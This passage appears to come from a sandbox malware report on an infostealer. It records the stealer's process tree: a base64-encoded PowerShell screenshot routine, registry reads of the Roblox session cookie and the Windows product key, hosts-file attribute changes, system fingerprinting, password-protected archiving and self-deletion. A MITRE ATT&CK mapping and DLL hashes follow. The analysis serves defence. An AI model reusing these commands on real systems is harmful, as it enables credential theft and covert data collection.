QBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3284
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5ixpzi2w\5ixpzi2w.cmdline"
        5⤵
        
        PID:3424
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES69E5.tmp" "c:\Users\Admin\AppData\Local\Temp\5ixpzi2w\CSC9C9E7C19C17B4B30A1944C9F9FFED763.TMP"
        6⤵
        
        PID:1928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4060
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1924
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:5104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1936
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3404
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4956
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:756
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2124
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4060
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2580
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:688
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4164
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI10082\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\UKyDD.zip" *"
    3⤵
    PID:2976
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2124
  - - C:\Users\Admin\AppData\Local\Temp\_MEI10082\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI10082\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\UKyDD.zip" *
      4⤵
      Executes dropped EXE
      PID:4704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2376
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4980
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:2880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1516
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2468
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1968
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:1720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    PID:1736
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      Runs ping.exe
      PID:3936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:4472
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{73e12d6a-1c0b-7943-905c-aad00cad5d10}\dcdbas64.inf" "9" "4dfcb1ac3" "0000000000000140" "WinSta0\Default" "0000000000000158" "208" "c:\windows\temp\{8db5c695-d425-455c-84e6-2908b1f93687}\hapi"
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Modifies data under HKEY_USERS
  PID:3552
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\SYSTEM\0001" "C:\Windows\INF\oem3.inf" "oem3.inf:ef423affc3c959fa:dcdbas:7.4.0.453:root\dcdbas," "4dfcb1ac3" "0000000000000140"
  2⤵
  - Drops file in Drivers directory
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  PID:744

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\35436c3312eb4e03bb85c77faef1f8e9 /t 4344 /p 3960
1⤵
PID:4168

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI10082\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\_bz2.pyd

Filesize
46KB

MD5
0c13627f114f346604b0e8cbc03baf29

SHA1
bf77611d924df2c80aabcc3f70520d78408587a2

SHA256
df1e666b55aae6ede59ef672d173bd0d64ef3e824a64918e081082b8626a5861

SHA512
c97fa0f0988581eae5194bd6111c1d9c0e5b1411bab47df5aa7c39aad69bfbeca383514d6aaa45439bb46eacf6552d7b7ed08876b5e6864c8507eaa0a72d4334

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\_ctypes.pyd

Filesize
57KB

MD5
38fb83bd4febed211bd25e19e1cae555

SHA1
4541df6b69d0d52687edb12a878ae2cd44f82db6

SHA256
cd31af70cbcfe81b01a75ebeb2de86079f4cbe767b75c3b5799ef8b9f0392d65

SHA512
f703b231b675c45accb1f05cd34319b5b3b7583d85bf2d54194f9e7c704fbcd82ef2a2cd286e6a50234f02c43616fbeccfd635aefd73424c1834f5dca52c0931

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\_decimal.pyd

Filesize
104KB

MD5
7ba541defe3739a888be466c999c9787

SHA1
ad0a4df9523eeeafc1e67b0e4e3d7a6cf9c4dfac

SHA256
f90efa10d90d940cde48aafe02c13a0fc0a1f0be7f3714856b7a1435f5decf29

SHA512
9194a527a17a505d049161935432fa25ba154e1aee6306dee9054071f249c891f0ca7839de3a21d09b57fdc3f29ee7c4f08237b0dfffafa8f0078cfe464bed3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\_hashlib.pyd

Filesize
33KB

MD5
596df8ada4b8bc4ae2c2e5bbb41a6c2e

SHA1
e814c2e2e874961a18d420c49d34b03c2b87d068

SHA256
54348cfbf95fd818d74014c16343d9134282d2cf238329eec2cda1e2591565ec

SHA512
e16aad5230e4af7437b19c3db373b1a0a0a84576b608b34430cced04ffc652c6fb5d8a1fe1d49ac623d8ae94c8735800c6b0a12c531dcdd012b05b5fd61dff2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\_lzma.pyd

Filesize
84KB

MD5
8d9e1bb65a192c8446155a723c23d4c5

SHA1
ea02b1bf175b7ef89ba092720b3daa0c11bef0f0

SHA256
1549fe64b710818950aa9bf45d43fe278ce59f3b87b3497d2106ff793efa6cf7

SHA512
4d67306fe8334f772fe9d463cb4f874a8b56d1a4ad3825cff53cae4e22fa3e1adba982f4ea24785312b73d84a52d224dfb4577c1132613aa3ae050a990e4abdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\_queue.pyd

Filesize
24KB

MD5
fbbbfbcdcf0a7c1611e27f4b3b71079e

SHA1
56888df9701f9faa86c03168adcd269192887b7b

SHA256
699c1f0f0387511ef543c0df7ef81a13a1cffde4ce4cd43a1baf47a893b99163

SHA512
0a5ba701653ce9755048ae7b0395a15fbb35509bef7c4b4fe7f11dc4934f3bd298bcddbf2a05b61f75f8eb44c4c41b3616f07f9944e0620b031cbe87a7443284

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\_socket.pyd

Filesize
41KB

MD5
4351d7086e5221398b5b78906f4e84ac

SHA1
ba515a14ec1b076a6a3eab900df57f4f37be104d

SHA256
a0fa25eef91825797f01754b7d7cf5106e355cf21322e926632f90af01280abe

SHA512
a1bcf51e797ccae58a0b4cfe83546e5e11f8fc011ca3568578c42e20bd7a367a5e1fa4237fb57aa84936eec635337e457a61a2a4d6eca3e90e6dde18ae808025

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-console-l1-1-0.dll

Filesize
15KB

MD5
c2703e334bc2d4803edad187c54eef10

SHA1
6f1cd0e74b53fe7407f792ee290c89724fa4015d

SHA256
574a2c414d1670ca8f18d91de9382036027dee7c33aa20dab3e55ffd33aac7a6

SHA512
8fa194c9e8ec559f815ad8fcf14ef3754eb81aef18c175ae7108bad32f498dd07ad3ac5211999ec6cf786a287d7979fb924400abfaae99a61ebdb11fd2ea47e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-datetime-l1-1-0.dll

Filesize
14KB

MD5
316aff3b19f1d1ff93765e22541942e6

SHA1
3ceb9de87ffde00a4c9133e43f6f7c91dff33312

SHA256
dd6d00f18ed904721caaf572f23c43ccababa7bccd4347ebfbb6b199709c8d0a

SHA512
69c4b01254c2ba48dd3c3a50787b31cc8cb1ece58ffff31cc2d9926147e730bc3aa1ffffcfb24cd9a6ad22ffed5ab5335f452e7b13e1671e59391286aab34069

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-debug-l1-1-0.dll

Filesize
14KB

MD5
c92ab29e942ecd4b746a971cb186c4d0

SHA1
84581bb4c167a758d547359099c305e0680567ad

SHA256
785d5af456198db9473117ff17c653398bb36679baefc2cf9a28ef9ef80c1673

SHA512
7538ee5f8efa6784f62d17bc2e86176f5c55247585e95e685d55b46c8d20b33e0352530c8cca263548a79c3e7faebd74dfbf151cce9d02db1df5393edc6ce8f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
14KB

MD5
9ee6bf367260f556e3a52628bd9e2192

SHA1
3b03bbaff26874bb1f4196fd81f248de72513e77

SHA256
dd0f477386370f57ecc677542a72061560b7c3bb983a673af4656c6a7fe8cdd2

SHA512
e97fd2ee4591e0fb077af2c28613284e083ad26f4f6cd4e2024f4e3328ad0ac821610103c828b20fefcca3c9e192d4e1b8d3821fa85f320193630b72705cee88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-file-l1-1-0.dll

Filesize
18KB

MD5
532f012317764057e98fd752d7d40571

SHA1
4d3b657307d0139ca5a8c20ab21330dc7dd7ff2f

SHA256
daee555173ede967ac6c4b8487d722b6bfc5727df43b50898f63a63519de9691

SHA512
50a1bb184a7036f6baea20e2b137640402fd684284e2f649e07727bd005dd09ba1d7d1233e2c2cbdfa30b09520ca93c6e1d2c69d51436c811b1d35d70f08b53d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-file-l1-2-0.dll

Filesize
14KB

MD5
cb68b93a8f00dbde326167b4687e12eb

SHA1
d137d33c5685e188486768a0aa21bf3e2f1b0a8e

SHA256
adcac847108f73bb4fa568d15b57f2ca25f44c5ba43db490dbe5c0b5e45b866d

SHA512
50ccaab53b48e86ad625c1e47d2ec5380255869661cb58d456529e69d99335f1feadfe90c41664850c9944e6cba626e1fe19e1d0cd11e60a777f867728f9baf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-file-l2-1-0.dll

Filesize
14KB

MD5
b5077f8597888a6c992c5a0ed411d030

SHA1
8d8e5593efbec6ac0d07375c53b40c6455428ed2

SHA256
a4cbe5eb1ba37433798803d65aa9a48ad9188490a46d5f19d7fb01efb45eda5b

SHA512
da7b874f694c91a41041a45d9f1085dd2d676f108d8a1fe11e5b921b50963735c8e38bb0e9de0fdeb36e6ff61d77bb20c2ecf102d6ed5a7f6d2fbb867b42f80c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-handle-l1-1-0.dll

Filesize
14KB

MD5
019d0dd031fe5925f2bc5b875dfb78b6

SHA1
c052235d06ea6f2bee005ed722673f4d52449c4d

SHA256
259019eece360281e77152b2aec10ba4df5faf1c19d907847446f05153e57611

SHA512
bae72e62d0c26ba938c1c5e0aa2673dba9d4fe18e0ac71fa47d98539a0dbb7fae309f1d0516f93ad36cd1b6eed0c7ade9efb0a4f54036a5eeb5e7ada91afaf08

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-heap-l1-1-0.dll

Filesize
15KB

MD5
e97ecaad8d77edf8ac34e304b5cb55ba

SHA1
dae1afebfa23262bc7a784cb49474c7b284b0806

SHA256
4151190991bc790b2071b99c964ca4a8d66d0949056051cd3a21f3c7347b31b4

SHA512
aaf065038dd1302d2d5748c55ebdc63e96169549c601bca943fa74036868382ce08e8ff3f026fc97402b41d2e7770926b25260412d77164407303594918d8d5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-interlocked-l1-1-0.dll

Filesize
14KB

MD5
dac38e8681893cd056eec0e1f2999783

SHA1
76261e105246dcc8ae1a7909f6288b62e2bf66fd

SHA256
2a52dc3b02df38edea46437c58620c9e5f26d3d58a319759b0eae3ef31538f96

SHA512
8785c01d2c19b9908df9898674f7f1ce77d4b35ed95b502bbd1d68ff100d249b7feca57635edaf00f3d24f29130cabf58ee68e35d38d818918c3e35e1b0cdcc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-libraryloader-l1-1-0.dll

Filesize
15KB

MD5
7e65b36b23099e5d237390a6ae97656a

SHA1
bce26054244b8e4d65a8f221677d6e57ebaad9e2

SHA256
c859e62af599e6ee27fe41632dcba20c732fec5630108a4f4bc7a2d145ae1cf3

SHA512
237c27d901d8cb7f0967dde12151b109ac1ed47faf4a8fc69f5df960f8f04b0a128129133fddaa0f9f109cdee2e676207f4f96e073b23822af7b90b98021bac6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-localization-l1-2-0.dll

Filesize
17KB

MD5
a9bc8d4c284e7d8444f2c1d969403a1c

SHA1
d55b97b27906e149fa18f84d1f159086d4d77f44

SHA256
f8960e80bbf6e2bd87dda167fc9f62688fde157998844b693472384e5f3a35dd

SHA512
5747fb313f02c99e6f6e36698823a583bc5bcbdec0e2072005162a34124c4dc4aa3cb05ca6ea2b667bfe3686a2126d0f3d0d2fa363850cfcfd134e38f1f4a340

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-memory-l1-1-0.dll

Filesize
15KB

MD5
5af4e8878a993458da0092d71cd66bb7

SHA1
81b3750bb5516c5f7420b2d814b79ad208316166

SHA256
da748a40f4bd5721b13abe43492694204944dcb142bc5ae9a951cac9f3b0721d

SHA512
49ad430175e2a188f4b0c020f5cd9b09a3bd2aaddf4886646cd1f7b11c6563747d42f989098ccd70e03c7d82dab9379c67df7e0dd92bde29fa99b1aa7b1d7fe1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-namedpipe-l1-1-0.dll

Filesize
14KB

MD5
3131b3c6a89bbf6bda403c9c779f673e

SHA1
274d5abe5421dc1c4861e8e30ed4860e7aa3dd9b

SHA256
d3857da8b6466aed1ce6b02881d6bfe523858c4642841e13f9aa3da7960caa28

SHA512
a571b9fa56d287200b1739aa50360aa64454b8fabbf4a9a6f85b015386f0b5e5d4601f433708e46a384675d286eebf8af7d4055efdd70905eb2478e352c4c46d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-processenvironment-l1-1-0.dll

Filesize
15KB

MD5
74f23876b6cda23d08ba9ceb98d1bef5

SHA1
292c0e19565de194c09041315b18d85224387b47

SHA256
05ef6cd84b0915edc26ddf6a914c5d2e0d43922ab2f7d4cdbdfd01bc2dd185bf

SHA512
0d1a10bba986ae6c7abe1c3542ab089eb4b2033b7e81438368b26f5c9622fb720fd37600ae5ddec65157079d3a5331ed35f3ddb44015324e268241148997d4a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-processthreads-l1-1-0.dll

Filesize
16KB

MD5
730ace8aff6484f9a1e67edb7d274426

SHA1
c7933612406475895161854d89f2e7996eab0da9

SHA256
3c29653da40662cf9a6ffbe7ab4dc994ce8447c421588f560b0482bb05e704ce

SHA512
0e355b325d35adb29239e4a8567f8f0a21fbd886dfe1e46146741c2c8c42652d99bde4b52a1d5d21fcc4144b45fab66462e9115ae236303eade3571f4a28e59e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
15KB

MD5
6f1cdc7807283a3c4b83b20f2e4d1553

SHA1
3425eb289de69fcc64ac3b61647dbebd345a7e69

SHA256
1dc540c15550ee51c2429cd2f7307497ce6dc3ed50ed5a4f954d1ce57b19c3d3

SHA512
58281f3e30c272986d67fa8c4b8b8e1b7b9850a06b6333d8bfe04bfdc237b050fcf90003c69f9db23572970abb8f1f33386fb3abfee246c37477944bfb2f134e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-profile-l1-1-0.dll

Filesize
14KB

MD5
e0e8e6ef074b044f4c500657eece93aa

SHA1
b0af7f2d3ed500b8b2bd1213529e33616495cdbc

SHA256
6fc9a1efbd98312172cb4e20e5084aa31a68cee4005629f5f9ecc2e295132ed5

SHA512
6e7f4e9cadeb34325fbb36bc1e7075553714cc2faf12b3cae28361b0a922475be0cc23a7ba31d17f3708d7694171b4b9910901cb76921c9c16e7bce3f25bdc3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-rtlsupport-l1-1-0.dll

Filesize
15KB

MD5
9ccbc2bda8553258b2ddae64d54623b3

SHA1
38562ccbfd673c8551a9e7d6d9d08a33f30770bb

SHA256
4354dd9ab806648b26d2deba4014896e780e5b52b3be4feeb3eae5b7f05b1fcf

SHA512
01996ce32d2ea7187cdd534cff65ae2e0d3c0cd02f7612156dbbc3600f519430cb8f48bbe3934ac2a32d4648c58d116dd4013b9d5917cba8ac24820f16110bfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-string-l1-1-0.dll

Filesize
14KB

MD5
46db619107fa9c458ac256dde1dc1704

SHA1
e7f4fb041380f465cd7e26f0222fb93b3022247f

SHA256
48c476edb1ed74f75db11f570e4e723dd44166b531378cc2f0a0420d81788450

SHA512
91f2ffdd0686316e07468f5c5609f4a78e8c8fc67a0f93d18146b58504529819d29f9c2d2e863e2f672d66ff114e912f9da18b2f42f3c7fd219558581e322dc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-synch-l1-1-0.dll

Filesize
16KB

MD5
1b0c176c8f1385f56d898a5ac7cffcb0

SHA1
863a8e6383ea88fcb7879e9b5d563f8610b4d2e0

SHA256
043048172a48153f9c1276276dc6c70be420da95d9f32748c43abfff867105ac

SHA512
cac83a4f0162d9ef46b2c7d37b216e2668a2d9332b2d6483d9eba50ae6d58d415673717b4ecf1bea1adbb78329818b0fc72253351f2d46a631400fdc5e224cff

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-synch-l1-2-0.dll

Filesize
15KB

MD5
f65941543d4de878955181163b445715

SHA1
9f892cad564f76d93bec455717e296bdd57a2e07

SHA256
f1d1d0697f6a15426ee6b14e37f9f7535aa8698139247b271879e6e1b4aaeafb

SHA512
648fe425effac0550d2f52b23b2e8013a467416a3c9f2bd3ae87390dbdd74300026fe98cff42dacad7db7661dcd4df46e288144b329b84a80cf742f204d210f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-sysinfo-l1-1-0.dll

Filesize
15KB

MD5
6bd410e3c7492391afd42fadec94e90f

SHA1
e667c4523838b02bc2d900f0801489255b8504ee

SHA256
6cc0f4fe0d7ba64dec1fa76e4bda7a63bd4335d29891decab2ef75533b4115fa

SHA512
4334b78206725495859acc04a5363ca8ca4450ad59e52800737eee79086cb4edd39d0343138fc1e66cca2a1bc8f1bd5774407e7dac12dc8e6dcd02104682a0cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-timezone-l1-1-0.dll

Filesize
14KB

MD5
b7ac0f70118f9be4cfd7c59876143726

SHA1
636aba07d418c9abf551f2d818ed571c0039ddfc

SHA256
750e1b5c5546aa2d72761dfe8e5c2db2d399f292590599c27c28ffc697fad1ed

SHA512
ff118bfc1e410a167533d6d8c2d3c323048a1d739dea92c8a6823f78670b2e5708d8823a54edfc53d404aeac3abd0d6d8c0803eb9a8d0484c9119135d5519282

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-core-util-l1-1-0.dll

Filesize
14KB

MD5
07623c111dc0d20fbf620b8629841053

SHA1
944a6c5f378f4c4011e5ca6e3b63ec513b85d83f

SHA256
642f3b0b89ffc0eeeb5d52cf16ce120c1100c89223256f58b07b6da09b4b7d80

SHA512
a92705d264989f801017171222a3d9016e32ef7d099d50170fbb6f0cbba6cb031e5b1d2b99dec1aee59e20bf89ddf1c14fd499ed78846f3bfd9cd3b8a7539076

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-crt-conio-l1-1-0.dll

Filesize
15KB

MD5
b212f1510563f28cc5ab6ee77fc78671

SHA1
5f944bb99af37732442ebc91d6c6c97e48d3659e

SHA256
02f70ae427c5de55814431d93144814166401bfcfa3fae819f8f87ebadaa2c5b

SHA512
db14497a9a9618488594223a3d6372ca72eeefe354806481022b810cef4194488fdbb8c7510408d0b1a5c4b9d9ad6be77dbbbc374b75484c55f04362c071c7e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-crt-convert-l1-1-0.dll

Filesize
18KB

MD5
633d6012fb5828b4aa23bc42d8784ef4

SHA1
0f4b5c853c3e2380fb9b5777b5ae11e20ef2446a

SHA256
95c0c7caf9961e1ebc5eaf66489a37b48d8183f1960223f36bd494b1c4585d34

SHA512
d19cb45a035a380bc09f81fd060013d1a20e2d720e3ceb2ec4dcb1af35420b9f23041dcf89e1d78d9d97e6634e82e7c405b3109210a6054e283252915f87afbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-crt-environment-l1-1-0.dll

Filesize
15KB

MD5
8d463e990839e63b3ec9bc30da59cebe

SHA1
f6fe35e1820a54929fe5a364db3a77e0ec4a90e1

SHA256
5abec965a43c078fcf84194fdb0511b85fc9e59016fb6ade0f696fdfa4475e40

SHA512
2cd2dea070847c70e6e9da98b06b46cfb388e0d922bca3bc99563eaca034c1903840674d2e0f9b46c26d26c0e4f83ffe01bc16a441ee6d30cb5d6f2f02f44e8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-crt-filesystem-l1-1-0.dll

Filesize
16KB

MD5
a897fe4fedbb87115c0bd5f4542da139

SHA1
a5abeb3b4304a6fccbb81139c988ba72159f6a9f

SHA256
f6fc5fc4b2ac316e24211081a4e6598ed06765a72be8ac808c8c799ea7e14064

SHA512
8979ee827ab5dc0589ba1a7827bd563f445dd654c1024b06ad8b7e52519914078e7944c0a995f0c324f7a7195dfe1ab9f9c3672ada0db284df24d53bb3c4055a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-crt-heap-l1-1-0.dll

Filesize
15KB

MD5
32446c52fc4e82508a58a1f1d9f2c6a5

SHA1
7a1ec3d0fadd95d5c2975dc91ad103eb6fdf5ac6

